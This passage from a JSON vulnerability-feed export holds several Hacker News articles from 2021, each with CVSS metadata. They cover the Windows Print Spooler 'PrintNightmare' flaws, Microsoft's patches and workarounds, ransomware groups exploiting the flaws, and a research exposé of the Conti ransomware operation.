Vulnerability](https://thehackernews.com/images/-2GxRoKJtyWA/YRSwMjr9x2I/AAAAAAAADgY/_N1Bo0X9GrsWaOMamfoYSHTTfcM5ZJYbwCLcBGAsYHQ/s728-e1000/PRINTER.jpg)](<https://thehackernews.com/images/-2GxRoKJtyWA/YRSwMjr9x2I/AAAAAAAADgY/_N1Bo0X9GrsWaOMamfoYSHTTfcM5ZJYbwCLcBGAsYHQ/s0/PRINTER.jpg>)\n\nIt's worth noting that the Windows maker has since released [updates](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) to change the default Point and Print default behavior, effectively barring non-administrator users from installing or updating new and existing printer drivers using drivers from a remote computer or server without first elevating themselves to an administrator.\n\nAs workarounds, Microsoft is recommending users to stop and disable the Print Spooler service to prevent malicious actors from exploiting the vulnerability. The CERT Coordination Center, in a [vulnerability note](<https://www.kb.cert.org/vuls/id/131152>), is also advising users to block outbound SMB traffic to prevent connecting to a malicious shared printer.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T05:23:00", "type": "thn", "title": "Microsoft Warns of Another Unpatched Windows Print Spooler RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36958"], "modified": "2021-08-12T06:19:03", "id": "THN:3F83D0C001F2A9046C61A56F5ABE7695", "href": "https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[![](https://thehackernews.com/images/-YB6xMmNkBp0/YRYuIvxMidI/AAAAAAAADhg/a2Ee5QkoQZw6JlnYhCIdg3Nk-HM2yu2wwCLcBGAsYHQ/s0/ransomware.jpg)](<https://thehackernews.com/images/-YB6xMmNkBp0/YRYuIvxMidI/AAAAAAAADhg/a2Ee5QkoQZw6JlnYhCIdg3Nk-HM2yu2wwCLcBGAsYHQ/s0/ransomware.jpg>)\n\nRansomware operators such as Magniber and Vice Society are actively exploiting vulnerabilities in Windows Print Spooler to compromise victims and spread laterally across a victim's network to deploy file-encrypting payloads on targeted systems.\n\n\"Multiple, distinct threat actors view this vulnerability as attractive to use during their attacks and may indicate that this vulnerability will continue to see more widespread adoption and incorporation by various adversaries moving forward,\" Cisco Talos [said](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) in a report published Thursday, corroborating an [independent analysis](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) from CrowdStrike, which observed instances of Magniber ransomware infections targeting entities in South Korea.\n\nWhile Magniber ransomware was first spotted in late 2017 singling out victims in South Korea through malvertising campaigns, Vice Society is a new entrant that emerged on the ransomware landscape in mid-2021, primarily targeting public school districts and other educational institutions. The attacks are said to have taken place since at least July 13.\n\nSince June, a series of \"PrintNightmare\" issues affecting the Windows print spooler service has come to light that could enable remote code execution when the component performs privileged file operations -\n\n * [**CVE-2021-1675**](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on June 8)\n * [**CVE-2021-34527**](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on July 6-7)\n * [**CVE-2021-34481**](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)\n * [**CVE-2021-36936**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10) \n * [**CVE-2021-36947**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)\n * [**CVE-2021-34483**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Elevation of Privilege Vulnerability (Patched on August 10)\n * [**CVE-2021-36958**](<https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Unpatched)\n\nCrowdStrike noted it was able to successfully prevent attempts made by the Magniber ransomware gang at exploiting the PrintNightmare vulnerability.\n\nVice Society, on the other hand, leveraged a variety of techniques to conduct post-compromise discovery and reconnaissance prior to bypassing native Windows protections for credential theft and privilege escalation.\n\n[![Ransomware](https://thehackernews.com/images/-JlsTWIHVgX4/YRYltMOGBKI/AAAAAAAADhQ/pzUFIcW6y0ABjOe3PuUQE5cPSnEOvGP9ACLcBGAsYHQ/s728-e1000/ransomware.jpg)](<https://thehackernews.com/images/-JlsTWIHVgX4/YRYltMOGBKI/AAAAAAAADhQ/pzUFIcW6y0ABjOe3PuUQE5cPSnEOvGP9ACLcBGAsYHQ/s0/ransomware.jpg>)\n\nSpecifically, the attacker is believed to have used a malicious library associated with the PrintNightmare flaw (CVE-2021-34527) to pivot to multiple systems across the environment and extract credentials from the victim.\n\n\"Adversaries are constantly refining their approach to the ransomware attack lifecycle as they strive to operate more effectively, efficiently, and evasively,\" the researchers said. \"The use of the vulnerability known as PrintNightmare shows that adversaries are paying close attention and will quickly incorporate new tools that they find useful for various purposes during their attacks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T08:29:00", "type": "thn", "title": "Ransomware Gangs Exploiting Windows Print Spooler Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34527", "CVE-2021-36936", "CVE-2021-36947", "CVE-2021-36958"], "modified": "2021-08-13T08:32:51", "id": "THN:6428957E9DED493169A2E63839F98667", "href": "https://thehackernews.com/2021/08/ransomware-gangs-exploiting-windows.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:20", "description": "[![](https://thehackernews.com/images/-dWO_rqbdIfE/YPENEeXU5vI/AAAAAAAADNg/aAsoS9_8txQ842LEOAjpzJcvpkm6tro9wCLcBGAsYHQ/s0/Windows-Print-Spooler-Vulnerability.jpg)](<https://thehackernews.com/images/-dWO_rqbdIfE/YPENEeXU5vI/AAAAAAAADNg/aAsoS9_8txQ842LEOAjpzJcvpkm6tro9wCLcBGAsYHQ/s0/Windows-Print-Spooler-Vulnerability.jpg>)\n\nMicrosoft on Thursday shared fresh guidance on yet another vulnerability affecting the Windows Print Spooler service, stating that it's working to address it in an upcoming security update.\n\nTracked as [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) (CVSS score: 7.8), the issue concerns a local privilege escalation flaw that could be abused to perform unauthorized actions on the system. The company credited security researcher Jacob Baines for discovering and reporting the bug.\n\n\"An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges,\" the Windows maker said in its advisory. \"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\nHowever, it's worth pointing out that successful exploitation of the vulnerability requires the attacker to have the ability to execute code on a victim system. In other words, this vulnerability can only be exploited locally to gain elevated privileges on a device.\n\n[![](https://thehackernews.com/images/-KUjZieTgFsk/YPENj7mkDHI/AAAAAAAADNo/7YO-HAzw4LQN5_eg5egoI8gP2YeP34pjwCLcBGAsYHQ/s0/hacking.jpg)](<https://thehackernews.com/images/-KUjZieTgFsk/YPENj7mkDHI/AAAAAAAADNo/7YO-HAzw4LQN5_eg5egoI8gP2YeP34pjwCLcBGAsYHQ/s0/hacking.jpg>)\n\nAs workarounds, Microsoft is recommending users to stop and disable the Print Spooler service to prevent malicious actors from exploiting the vulnerability.\n\nThe development comes days after the Redmond-based firm rolled out patches to address a critical shortcoming in the same component that it disclosed as being actively exploited to stage in-the-wild attacks, making it the third printer-related flaw to come to light in recent weeks.\n\nDubbed PrintNightmare ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>)), the vulnerability stems from a missing permission check in the Print Spooler that enables the installation of malicious print drivers to achieve remote code execution or local privilege escalation on vulnerable systems.\n\nHowever, it later emerged that the out-of-band security update could be entirely bypassed under specific conditions to gain both local privilege escalation and remote code execution. Microsoft has since said the fixes are \"working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-16T04:40:00", "type": "thn", "title": "Microsoft Warns of New Unpatched Windows Print Spooler Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-34527"], "modified": "2021-07-17T11:53:08", "id": "THN:CF5E93184467C7B8F56A517CE724ABCF", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[![Conti Ransomware Group](https://thehackernews.com/new-images/img/a/AVvXsEguJG5dD1Vh67fJlg0O-HXucpsF2Y-eVW6kua8F3Er_7OwG5WZpZAqvZHKbXJboPvuTyfrTXpc260OZ87-4ehJm-_qY8JOnLJxhWok-es74ZTW3O7ua3WuueglfYtH7632jDmh5DfPftDD998FED2xruJFMtTPwe_eI7umOKXrdazu4WRTC-OnHg7ND=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEguJG5dD1Vh67fJlg0O-HXucpsF2Y-eVW6kua8F3Er_7OwG5WZpZAqvZHKbXJboPvuTyfrTXpc260OZ87-4ehJm-_qY8JOnLJxhWok-es74ZTW3O7ua3WuueglfYtH7632jDmh5DfPftDD998FED2xruJFMtTPwe_eI7umOKXrdazu4WRTC-OnHg7ND>)\n\nThe clearnet and dark web payment portals operated by the [Conti](<https://thehackernews.com/2021/05/fbi-warns-conti-ransomware-hit-16-us.html>) ransomware group have gone down in what appears to be an attempt to shift to new infrastructure after details about the gang's inner workings and its members were made public.\n\nAccording to [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1461450607311605766>), \"while both the clearweb and Tor domains of the leak site of the Conti ransomware gang is online and working, both their clearweb and Tor domains for the payment site (which is obviously more important than the leak) is down.\"\n\nIt's not clear what prompted the shutdown, but the development comes as Swiss cybersecurity firm PRODAFT [offered](<https://www.prodaft.com/resource/detail/conti-ransomware-group-depth-analysis>) an unprecedented look into the group's ransomware-as-a-service (RaaS) model, wherein the developers sell or lease their ransomware technology to affiliates hired from darknet forums, who then carry out attacks on their behalf while also netting about 70% of each ransom payment extorted from the victims.\n\nThe result? Three members of the Conti team have been identified so far, each playing the roles of admin (\"Tokyo\"), assistant (\"it_work_support@xmpp[.]jp\"), and recruiter (\"IT_Work\") to attract new affiliates into their network.\n\nWhile ransomware attacks work by encrypting the victims' sensitive information and rendering it inaccessible, threat actors have increasingly latched on to a two-pronged strategy called double extortion to demand a ransom payment for decrypting the data and threaten to publicly publish the stolen information if the payment is not received within a specific deadline.\n\n[![Conti Ransomware Group](https://thehackernews.com/new-images/img/a/AVvXsEgOlxdMar0Fk9C_1oq4rsZqCsRuaWDFa_UwPznj1p4XnxV22g7c-3gidrF7ZVnxd0TVDTn8qhzr16V265fVSa3d-p7SOODkUMikIREYKzV6MyCaPI1KWzNgYj3TduhqzgszRUX6zZkCytED5c4K-icaEZjwN4cvwnz1D0zehnwVGdYAwJXLo8uaJijX=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgOlxdMar0Fk9C_1oq4rsZqCsRuaWDFa_UwPznj1p4XnxV22g7c-3gidrF7ZVnxd0TVDTn8qhzr16V265fVSa3d-p7SOODkUMikIREYKzV6MyCaPI1KWzNgYj3TduhqzgszRUX6zZkCytED5c4K-icaEZjwN4cvwnz1D0zehnwVGdYAwJXLo8uaJijX>)\n\n\"Conti customers \u2013 affiliate threat actors \u2013 use [a digital] management panel to create new ransomware samples, manage their victims, and collect data on their attacks,\" noted the researchers, detailing the syndicate's attack kill chain leveraging PrintNightmare ([CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>), [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>), and [CVE-2021-36958](<https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html>)) and FortiGate ([CVE-2018-13374](<https://nvd.nist.gov/vuln/detail/CVE-2018-13374>) and [CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)) vulnerabilities to compromise unpatched systems.\n\n[![Conti Ransomware Group](https://thehackernews.com/new-images/img/a/AVvXsEh5pQ7nISIe-f2lC7T7iJVkfmQ4L9uCXsO1rxdPo0YzkwJ4-Q15UkgDuRGhckTpdbAYrR1h3kYePBPrRNFWefg6MtaX_jlMsgcojwvu-zrrtvaw0hKxGJkD-dTl06UiZOX1R5kuboLkxyuot8hDBrgxX1fH8yoVdsv0e1f0rvziG6_Mw-IWMJUBBgQg=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEh5pQ7nISIe-f2lC7T7iJVkfmQ4L9uCXsO1rxdPo0YzkwJ4-Q15UkgDuRGhckTpdbAYrR1h3kYePBPrRNFWefg6MtaX_jlMsgcojwvu-zrrtvaw0hKxGJkD-dTl06UiZOX1R5kuboLkxyuot8hDBrgxX1fH8yoVdsv0e1f0rvziG6_Mw-IWMJUBBgQg>)\n\nEmerging on the cybercrime landscape in October 2019, Conti is believed to be the work of a Russia-based threat group called [Wizard Spider](<https://malpedia.caad.fkie.fraunhofer.de/actor/wizard_spider>), which is also the operator of the infamous [TrickBot](<https://thehackernews.com/2021/11/trickbot-operators-partner-with-shatak.html>) banking malware. Since then, at least 567 different companies have had their business-critical data exposed on the victim shaming site, with the ransomware cartel receiving over 500 bitcoin ($25.5 million) in payments since July 2021.\n\nWhat's more, an analysis of ransomware samples and the bitcoin wallet addresses utilized for receiving the payments has revealed a connection between Conti and Ryuk, with both families heavily banking on TrickBot, Emotet, and BazarLoader for actually [delivering the file-encrypting payloads](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) onto victim's networks via email phishing and other social engineering schemes.\n\n[![Conti Ransomware Group](https://thehackernews.com/new-images/img/a/AVvXsEgySne4_su9eRCap6MABBaa8kbBo2rWbr8gzBUOmkmLhbonXU-etPl5K4VuXHkduN2lH7fMHbQ7q8Wq0HsqBnUz9P3JWJBqtztJQAEPOJWnoAVuecd8Zyblq-TOPPfmILc40tmzfs9VX0h_utrR3fydA8JQm8EO0PO7BIKlRaSIBA8_I717s_bvckQ5=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgySne4_su9eRCap6MABBaa8kbBo2rWbr8gzBUOmkmLhbonXU-etPl5K4VuXHkduN2lH7fMHbQ7q8Wq0HsqBnUz9P3JWJBqtztJQAEPOJWnoAVuecd8Zyblq-TOPPfmILc40tmzfs9VX0h_utrR3fydA8JQm8EO0PO7BIKlRaSIBA8_I717s_bvckQ5>)\n\nPRODAFT said it was also able to gain access to the group's recovery service and an admin management panel hosted as a Tor hidden service on an Onion domain, revealing extensive details of a clearnet website called \"contirecovery[.]ws\" that contains instructions for purchasing decryption keys from the affiliates. Interestingly, an investigation into Conti's ransomware negotiation process [published](<https://team-cymru.com/blog/2021/10/05/collaborative-research-on-the-conti-ransomware-group/>) by Team Cymru last month highlighted a similar open web URL named \"contirecovery[.]info.\"\n\n\"In order to tackle the complex challenge of disrupting cybercriminal organizations, public and private forces need to work collaboratively with one another to better understand and mitigate the wider legal and commercial impact of the threat,\" the researchers said.\n\n**_Update:_** The Conti ransomware's payment [portals](<https://twitter.com/VK_Intel/status/1461810216241086467>) are back up and running, more than 24 hours after they were first taken down in response to a report that identified the real IP address of one of its recovery (aka payment) servers \u2014 217.12.204[.]135 \u2014 thereby effectively bolstering its security measures.\n\n\"Looks like Europeans have also decided to abandon their manners and go full-gansta simply trying to break our systems,\"the gang said in a statement posted on their blog, effectively confirming PRODAFT's findings, but characterizing the details as \"simply disinformation,\" and that \"the reported 25kk which we 'made since July' is straight-up BS - we've made around 300kk at least.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-19T06:50:00", "type": "thn", "title": "Experts Expose Secrets of Conti Ransomware Group That Made 25 Million from Victims", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13374", "CVE-2018-13379", "CVE-2021-1675", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-11-20T15:13:21", "id": "THN:F35E41E26872B23A7F620C6D8F7E2334", "href": "https://thehackernews.com/2021/11/experts-expose-secrets-of-conti.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[![Windows PrintNightmare Vulnerability](https://thehackernews.com/images/-wbLrBJlJCfE/YOUa-690-KI/AAAAAAAADG0/6tT84mGPz6gQ_5vYBxhkEE_spk0LW4WpwCLcBGAsYHQ/s728-e1000/windows-patch-update.jpg)](<https://thehackernews.com/images/-wbLrBJlJCfE/YOUa-690-KI/AAAAAAAADG0/6tT84mGPz6gQ_5vYBxhkEE_spk0LW4WpwCLcBGAsYHQ/s0/windows-patch-update.jpg>)\n\nMicrosoft has shipped an [emergency out-of-band security update](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#1646>) to address a critical zero-day vulnerability \u2014 known as \"PrintNightmare\" \u2014 that affects the Windows Print Spooler service and can permit remote threat actors to run arbitrary code and take over vulnerable systems.\n\nTracked as [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8), the remote code execution flaw impacts all supported editions of Windows. Last week, the company warned it had detected active exploitation attempts targeting the vulnerability.\n\n\"The Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system,\" the CERT Coordination Center said of the issue.\n\nIt's worth noting that PrintNightmare includes both remote code execution and a [local privilege escalation](<https://github.com/calebstewart/CVE-2021-1675>) vector that can be abused in attacks to run commands with SYSTEM privileges on targeted Windows machines.\n\n[![](https://thehackernews.com/images/-NzUbsCmtpLU/YOUekekqtnI/AAAAAAAADG8/HwnD7Xq3_iYftG9BrRvS1tJxIBOomRzXgCLcBGAsYHQ/s0/lpe.jpg)](<https://thehackernews.com/images/-NzUbsCmtpLU/YOUekekqtnI/AAAAAAAADG8/HwnD7Xq3_iYftG9BrRvS1tJxIBOomRzXgCLcBGAsYHQ/s0/lpe.jpg>)\n\n\"The Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" CERT/CC vulnerability analyst Will Dormann [said](<https://www.kb.cert.org/vuls/id/383432>).\n\nThis effectively means that the incomplete fix could still be used by a local adversary to gain SYSTEM privileges. As workarounds, Microsoft recommends stopping and disabling the Print Spooler service or turning off inbound remote printing through Group Policy to block remote attacks.\n\nGiven the criticality of the flaw, the Windows maker has issued patches for:\n\n * Windows Server 2019\n * Windows Server 2012 R2\n * Windows Server 2008\n * Windows 8.1\n * Windows RT 8.1, and\n * Windows 10 (versions 21H1, 20H2, 2004, 1909, 1809, 1803, and 1507)\n\nMicrosoft has even taken the unusual step of issuing the fix for Windows 7, which officially reached the end of support as of January 2020.\n\nThe [update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), however, does not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016, for which the Redmond-based company stated patches will be released in the forthcoming days.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-07T03:11:00", "type": "thn", "title": "Microsoft Issues Emergency Patch for Critical Windows PrintNightmare Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T03:38:13", "id": "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "href": "https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:23", "description": "[![windows print spooler vulnerability](https://thehackernews.com/images/-RJ_0BYkTxHY/YN7HyUD-_KI/AAAAAAAA4SA/dbXcZli9DPwTnJvla5sgZ3hDzIqO8zLRgCLcBGAsYHQ/s728-e1000/windows-print-spooler-vulnerability.jpg)](<https://thehackernews.com/images/-RJ_0BYkTxHY/YN7HyUD-_KI/AAAAAAAA4SA/dbXcZli9DPwTnJvla5sgZ3hDzIqO8zLRgCLcBGAsYHQ/s0/windows-print-spooler-vulnerability.jpg>)\n\nMicrosoft on Thursday officially confirmed that the \"**PrintNightmare**\" remote code execution (RCE) vulnerability affecting Windows Print Spooler is different from the issue the company addressed as part of its Patch Tuesday update released earlier this month, while warning that it has detected exploitation attempts targeting the flaw.\n\nThe company is tracking the security weakness under the identifier [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), and has assigned it a severity rating of 8.8 on the CVSS scoring system. All versions of Windows contain the vulnerable code and are susceptible to exploitation.\n\n\"A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\" Microsoft said in its advisory. \"An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\n\"An attack must involve an authenticated user calling RpcAddPrinterDriverEx(),\" the Redmond-based firm added. When reached by The Hacker News, the company said it had nothing to share beyond the advisory.\n\nThe acknowledgment comes after researchers from Hong Kong-based cybersecurity company Sangfor [published](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) a technical deep-dive of a Print Spooler RCE flaw to GitHub, along with a fully working PoC code, before it was taken down just hours after it went up.\n\n[![](https://thehackernews.com/images/-Zl5E2TyZRFQ/YN7Ej6s8x8I/AAAAAAAA4R4/FEYZ4JpYdakscU9e8eXMl9VEI0Hl1P_SwCLcBGAsYHQ/s0/ms.jpg)](<https://thehackernews.com/images/-Zl5E2TyZRFQ/YN7Ej6s8x8I/AAAAAAAA4R4/FEYZ4JpYdakscU9e8eXMl9VEI0Hl1P_SwCLcBGAsYHQ/s0/ms.jpg>)\n\nThe disclosures also set off speculation and debate about whether the June patch does or does not protect against the RCE vulnerability, with the CERT Coordination Center [noting](<https://kb.cert.org/vuls/id/383432>) that \"while Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have Point and Print configured with the NoWarningNoElevationOnInstall option configured.\"\n\nCVE-2021-1675, originally classified as an elevation of privilege vulnerability and later revised to RCE, was remediated by Microsoft on June 8, 2021.\n\nThe company, in its advisory, noted that PrintNightmare is distinct from CVE-2021-1675 for reasons that the latter resolves a separate vulnerability in RpcAddPrinterDriverEx() and that the attack vector is different.\n\nAs workarounds, Microsoft is recommending users to disable the Print Spooler service or turn off inbound remote printing through Group Policy. To reduce the attack surface and as an alternative to completely disabling printing, the company is also advising to check membership and nested group membership, and reduce membership as much as possible, or completely empty the groups where possible.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": 